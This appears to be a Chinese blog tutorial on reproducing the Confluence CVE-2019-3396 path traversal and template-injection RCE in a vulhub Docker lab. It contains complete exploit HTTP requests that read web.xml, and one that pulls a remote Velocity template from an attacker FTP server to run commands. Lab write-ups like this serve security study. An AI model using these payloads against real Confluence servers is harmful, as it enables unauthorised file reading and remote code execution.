完整复现流程-Atlassian Confluence 路径穿越与命令执行漏洞(CVE-2019-3396)

最新推荐文章于 2024-06-13 09:52:26 发布
最新推荐文章于 2024-06-13 09:52:26 发布
阅读量2.4k 收藏 6
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全 经验分享 centos
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/siaowei44/article/details/106978920
版权

搭建环境之前,最好将虚拟机的内存调至4G

靶机ip:192.168.187.130,os:centos7

攻击主机:ip:192.168.187.130, os:kali2019,工具:burpsuite

 

(一)安装pip,docker环境

由于docker-compose需要pip来安装,首先要安装pip环境

 

1.安装docker

用root账户登陆linux,我这里用的centos7,其他的linux系统也可以

然后执行

curl -s https://get.docker.com/ | sh

然后执行docker -v查看docker是否安装成功

 

2.安装pip

curl -s https://bootstrap.pypa.io/get-pip.py|python

可以看到成功安装了两个工具,这里再检查一下有没有安装setuptools工具

执行pip install setuptools

检查pip版本pip -V

 

3. pip安装docker-compose

这里可能会遇到很多报错,参考https://www.cnblogs.com/felixqiang/p/11946644.html解决

当出现这个时,意味着docker-compose成功安装

docker-compose -v查看版本号

 

4.克隆vulhub的github库

yum install git,首先安装git

git clone https://github.com/vulhub/vulhub,克隆vulhub库,可以下载可能会比较慢

到这里结束建议保存快照,每次做完一个漏洞复现就可以恢复快照从而恢复环境

或者输入docker-compose down移除环境

 

(二)启动环境

1.启动docker环境

cd vulhub/confluence/CVE-2019-3396/,进入CVE-2019-3396目录

systemctl start docker,启动docker

systemctl status docker,检查docker是否在运行

docker-compose build && docker-compose up -d,启动漏洞环境

这里搭建时间会很久,可以搞一个加速器

sudo vi /etc/docker/daemon.json

请在该配置文件中加入(没有该文件的话,请先建一个):

{
  "registry-mirrors": ["http://hub-mirror.c.163.com"]
}

出现这个说明启动成功了

再看一下8090端口是否启动

 

2.启动Confluence环境

在当前linux系统访问http://localhost:8090/,选择Trial Installation

这里会要求填写license key,先不要着急,点击Get an evaluation license,获取一个临时证书

之后他会让你注册一个账户,按要求注册即可,不需要个人信息,也不需要花钱,注册好后登陆

会来的申请证书的界面,按图示操作即可(不要选择Data Center和Addons)

然后进入License,选择一个证书

复制License Key

粘贴到之前这个页面的Confluence框,如果找不到这个页面就在地址栏输入localhost:8090

然后点击Next安装即可。这一步小内存VPS可能安装失败或时间较长(建议使用4G内存以上的机器进行安装与测试),请耐心等待。这里千万不要中断。

如果提示填写cluster node,路径填写/home/confluence即可。

后续可能要求你填写数据库账号密码,选择postgres数据库,地址为db,账号密码均为postgres

 至此靶机环境已经搭建完成

 

(四)漏洞复现

Atlassian Confluence是企业广泛使用的wiki系统,其6.14.2版本前存在一处未授权的目录穿越漏洞,通过该漏洞,攻击者可以读取任意文件,或利用Velocity模板注入执行任意命令。

我在kali上打开burpsuite,选择Repeater,输入如下文本,把localhost替换成靶机的ip地址,如果攻击主机和靶机是同一台机器则不用

POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost:8090/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
Content-Type: application/json; charset=utf-8
Content-Length: 176

{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"../web.xml"}}}

点击GO执行,拿到账户文件

抓取web.xml,将localhost替换为靶机ip,如果攻击主机和靶机是同一台机器则不用,burpsuite输入如下文本

POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost:8090/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
Content-Type: application/json; charset=utf-8
Content-Length: 172

{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"../web.xml"}}}

 拿到web.xml

 

6.12以前的Confluence没有限制文件读取的协议和路径,我们可以使用file:///etc/passwd来读取文件,也可以通过https://...来加载远程文件(在攻击主机上完成该步骤)

git clone https://github.com/Yt1g3r/CVE-2019-3396_EXP.git    //先下载EXP

然后用python搭建一个临时的ftp服务器

pip install pyftpdlib

cd CVE-2019-3396_EXP     //进入这个目录

python -m pyftpdlib -p 21    //启动FTP服务

将localhost替换为靶机ip,ip:port替换为攻击主机ip和21端口如果攻击主机和靶机是同一台机器则不用,在burpsuite输入如下文本

POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost:8090/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
Content-Type: application/json; charset=utf-8
Content-Length: 198

{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"ftp://ip:port/cmd.vm","cmd":"id"}}}

拿到uid

至此,漏洞复现完成。

 

可以参考Vulhub官方的复现教程

https://vulhub.org/#/environments/confluence/CVE-2019-3396/

参考文献:https://blog.csdn.net/jiangbuliu/article/details/94016753

                  http://www.ywnxs.com/1461.html

 

siaowei08
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Confluence未授权管理用户添加漏洞复现 (CVE-2023-22515)
holyxp的博客
11-02 790
Atlassian Confluence是企业广泛使用的wiki系统。 2023年10月4日,Atlassian官方发布了对于CVE-2023-22515漏洞的补丁。这个漏洞是由属性覆盖导致,利用该漏洞攻击者可以重新执行Confluence安装流程并增加管理员账户。
漏洞复现|(CVE-2019-3396Confluence文件读取&远程命令执行
weixin_42282189的博客
10-22 1141
作者: 墨阳 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 前言 1、漏洞简介 Confluence是一个专业的企业知识管理与协同软件,常用于构建企业wiki。它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。Confluence Server 与 Confluence Data Center 中的 Widget Connector 存在服务端模板注入漏洞,攻击者构造特定请求可远程遍历服务器任意文件,进而可以包含恶意文件来执行代码.
探索与征服:CVE-2019-3396—解锁Confluence安全新纪元
最新发布
gitblog_00068的博客
06-13 404
探索与征服:CVE-2019-3396—解锁Confluence安全新纪元 项目地址:https://gitcode.com/jas502n/CVE-2019-3396 在信息安全的世界里,每一次漏洞的发现都是一次技术与智慧的碰撞。今天,我们将聚焦于一个特别的开源项目——针对Atlassian Confluence的RCE(远程代码执行漏洞CVE-2019-3396。本文旨在深度剖析这一项目的重...
CVE-2019-3396 Confluence RCE漏洞简单粗暴复现
qq_42886216的博客
09-29 1233
CVE-2019-3396 Confluence RCE漏洞简单粗暴复现 1,前言 网上也有很多关于该漏洞的说明和复现,不再做过多阐述,在复现漏洞时踩了一些坑,然后发现了一个快速复现的方法,所以本篇文章介绍的是如何简单快速地复现漏洞。 2.漏洞复现过程简述 (1)rm文件 需求:需要远程包含一个后缀是.rm的文件,文件内容如下 #set ($e="exp") #set ($a=$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime
confluence添加用户_请教个问题,单独安装confluence,最后一步创建管理员帐号时报错:创建用户失败呢 - Linux论坛 - 51CTO技术论坛_中国领先的IT技术社区...
weixin_29532075的博客
01-26 665
复制内容到剪贴板代码:Causecom.atlassian.core.exception.InfrastructureException: Failed to create default group: confluence-usersat com.atlassian.confluence.setup.actions.SetupAdministrator.createDefaultGroups(S...
confluence 500错误 com.atlassian.util.concurrent.LazyReference
小小关的博客
12-08 649
com.atlassian.util.concurrent.LazyReference $ InitializationException:java.lang.NullPointerException com.atlassian.util.concurrent.LazyReference.getInterruptibly(LazyReference.java:149) com.atlassian.util.concurrent.LazyReference.get(LazyReference.java:112
docker-atlassian-confluence:打包在Docker映像中的Atlassian Confluence
02-16
docker run --detach --publish 8090:8090 cptactionhank/atlassian-confluence:latest 然后只需将您喜欢的浏览器导航到http://[dockerhost]:8090并完成配置。 配置 您可以通过提供以下环境变量来配置少量内容 环境...
docker-atlassian:基于docker容器的JIRA软件和Confluence的docker-compose业务流程
02-06
docker-atlassian:基于docker容器的JIRA软件和Confluence的docker-compose业务流程
docker-atlassian-confluence-data-center:Dockerized Atlassian Confluence Data Center 用于插件开发期间的本地测试
05-29
Docker Atlassian Confluence 数据中心 使用 Docker 启动,以便在插件开发期间进行本地测试。 它启动一个PostgreSQL数据库,几个Confluence群集节点和Apache2 HTTPD作为粘性会话负载平衡器。 共享的 confluence-...
atlassian-confluence-6.15.1-x64.bin.tar.gz
10-21
Confluence基于Java技术栈,采用Web应用服务器(如Tomcat)进行部署,并且提供了一个名为`atlassian-confluence-6.15.1-x64.bin`的可执行文件,这通常是一个包含所有运行所需组件的自解压文件,包括服务器、数据库...
companion-linux:适用于 Linux 的非官方 Atlassian Confluence Companion App
05-31
适用于 Linux 的 Confluence Companion 应用程序 适用于 Linux 的 Companion App 是 (最初仅适用于 Windows 和 MacOS)的非官方端口,用于在 Linux 客户端上使用。 它基本上只是一个很小的python脚本(〜400行)。 ...
Atlassian Confluence 路径穿越命令执行漏洞CVE-2019-3396
qq_45391176的博客
11-09 270
CVE-2019-3396 利用vulhub复现过程
Apache HTTP Server 路径穿越漏洞复现(CVE-2021-41773 )
qq_59975439的博客
06-10 6108
Apache HTTP Server 路径穿越漏洞复现(CVE-2021-41773 )
Docker---Docker-compose部署安装confluence并进行数据迁移
AnNan1997的博客
06-28 2397
docker-compose的yaml文件内容如下: 数据库使用的postgresql数据库。执行, 查看容器运行状态: 浏览器访问ip:端口,查看能否正常访问,如果没有更改data目录权限为daemon.daemon,访问会有报错,更改目录权限后,刷新浏览器界面即可。 选择产品安装,下一步; 全选,下一步; 记住此处服务器ID,后面激活confluence时需要使用。进入confluence容器,找到,拷贝到容器外进行激活替换操作。 下载 atlassian-extras-decoder-v
使用 Docker 搭建 Confluence
weixin_34228617的博客
03-30 1001
本文使用「署名 4.0 国际 (CC BY 4.0)」许可协议,欢迎转载、或重新修改使用,但需要注明来源。 署名 4.0 国际 (CC BY 4.0) 本文作者: 苏洋 创建时间: 2019年03月30日 统计字数: 5170字 阅读时间: 11分钟阅读 本文链接: soulteary.com/2019/03/30/… 使用 Docker 搭建 Confluence 小型团队协同,或者想花钱买个...
【vulhub】Atlassian Confluence 路径穿越命令执行漏洞CVE-2019-3396复现与反思!
qq_45300786的博客
09-14 536
搭建confluence看这3篇教程,该cve搭建是用Confluence Server, 但是tm就是没有Confluence Server https://www.icode9.com/content-4-915235.html https://blog.csdn.net/weixin_30813225/article/details/99669339 https://www.cnblogs.com/huangxiaosan/p/14290034.html 我这里直接提供key AAABQw0ODAo
confluence的各种错误详解以及安装与破解
热门推荐
闪电小子
05-06 3万+
最近公司需要搭建confluence,自己也花了一些时间才搭建出来,网上破解包和版本也是良莠不齐,这里就做一下简单整理,方便后来者少走些弯路。 先把需要的包放出来方便大家下载,解压出来就是需要的所有的包 链接:https://pan.baidu.com/s/1sBrNtO1HmGRhnfYI2Vb_zg 提取码:wseb 先简单罗列下步奏 首先前提准备 1.windows上安装jdk(运行破...
DVR登录绕过漏洞复现(CVE-2018-9995)
StriveBen的博客
05-11 4941
DVR登录绕过(CVE-2018-9995) 欢迎进群交流技术: 363034250 前言 前两天关于DVR登录绕过的漏洞文章就有了,最近看到了它的POC,是阿根廷一个叫费尔南德斯的大牛在4.30更新在其博客上的,直接能够获取多种DVR的明文凭证(登录密码),于是我也尝试了一下,屡试不爽… 漏洞复现 感觉问题在,这些DVR的cookie都好简单,”uid=admin”,然后凭证都是明文…...
docker-compose安装confluence
weixin_30455661的博客
07-21 584
1、首先安装docker-compose pip install docker-compose 安装完成提示: 2、编写mysql-confluence-compose.yaml文件 文件内容: mysql: container_name: mysql restart: always image: mys...
docker-compose jira confluence
01-10
而Jira和ConfluenceAtlassian公司开发的两个知名的协同办公工具。 Jira是一个专业的项目管理工具,可以帮助团队进行需求管理、任务分配、缺陷跟踪等工作。使用Docker-compose可以方便地部署Jira容器,并配置所需...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值